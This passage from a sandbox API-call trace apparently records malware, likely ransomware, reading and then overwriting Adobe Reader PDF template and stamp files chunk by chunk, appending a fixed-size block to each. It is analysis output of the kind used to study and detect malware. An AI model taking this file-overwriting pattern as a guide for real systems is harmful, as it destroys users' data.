lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.245] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x24d4a [0061.245] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b3238*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b3238*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.246] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.246] WriteFile (in: hFile=0x1c4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0061.246] CloseHandle (hObject=0x1c4) returned 1 [0061.258] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.258] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.259] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x13d46 [0061.259] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.259] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.259] ReleaseMutex (hMutex=0x168) returned 1 [0061.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0061.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0061.259] ReadFile (in: hFile=0x1c4, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.262] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12d46 [0061.262] ReadFile (in: hFile=0x1c4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.266] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12d46 [0061.266] WriteFile (in: hFile=0x1c4, lpBuffer=0x1e9a1a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e9a1a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.267] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.267] WriteFile (in: hFile=0x1c4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.267] CloseHandle (hObject=0x1c4) returned 1 [0061.761] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.765] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.765] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x48d8f [0061.768] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.768] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.768] ReleaseMutex (hMutex=0x168) returned 1 [0061.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0061.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0061.770] ReadFile (in: hFile=0x1c4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0061.787] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x47d8f [0061.787] ReadFile (in: hFile=0x1c4, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.790] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x47d8f [0061.791] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.792] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.792] WriteFile (in: hFile=0x1c4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0061.792] CloseHandle (hObject=0x1c4) returned 1 [0061.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.841] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.841] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2eb9e [0061.841] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.841] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.841] ReleaseMutex (hMutex=0x168) returned 1 [0061.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0061.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0061.841] ReadFile (in: hFile=0x1c4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0061.846] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2db9e [0061.846] ReadFile (in: hFile=0x1c4, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.848] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2db9e [0061.848] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.849] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.849] WriteFile (in: hFile=0x1c4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0061.849] CloseHandle (hObject=0x1c4) returned 1 [0061.853] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.853] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.854] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1182b [0061.854] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.854] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.854] ReleaseMutex (hMutex=0x168) returned 1 [0061.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0061.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7324c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0061.854] ReadFile (in: hFile=0x1c4, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.857] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1082b [0061.857] ReadFile (in: hFile=0x1c4, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.858] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1082b [0061.858] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.858] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.858] WriteFile (in: hFile=0x1c4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.858] CloseHandle (hObject=0x1c4) returned 1 [0061.860] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0061.861] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.861] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe6d5 [0061.861] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0061.861] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.861] ReleaseMutex (hMutex=0x168) returned 1 [0061.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0061.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0061.862] ReadFile (in: hFile=0x1c4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.864] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xd6d5 [0061.864] ReadFile (in: hFile=0x1c4, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.865] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xd6d5 [0061.865] WriteFile (in: hFile=0x1c4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.865] SetFilePointer (in: hFile=0x1c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0061.866] WriteFile (in: hFile=0x1c4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.866] CloseHandle (hObject=0x1c4) returned 1 [0061.867] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.158] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.158] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1a8db [0062.159] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.159] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.159] ReleaseMutex (hMutex=0x168) returned 1 [0062.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.159] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.166] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x198db [0062.167] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.171] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x198db [0062.172] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.173] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0062.173] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.173] CloseHandle (hObject=0x1d4) returned 1 [0062.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.236] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.236] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2eb9e [0062.237] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.237] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.237] ReleaseMutex (hMutex=0x168) returned 1 [0062.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.237] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.237] ReadFile (in: hFile=0x1d4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0062.252] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2db9e [0062.252] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.275] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2db9e [0062.276] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.277] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0062.277] WriteFile (in: hFile=0x1d4, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.277] CloseHandle (hObject=0x1d4) returned 1 [0062.461] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0062.701] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.701] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: 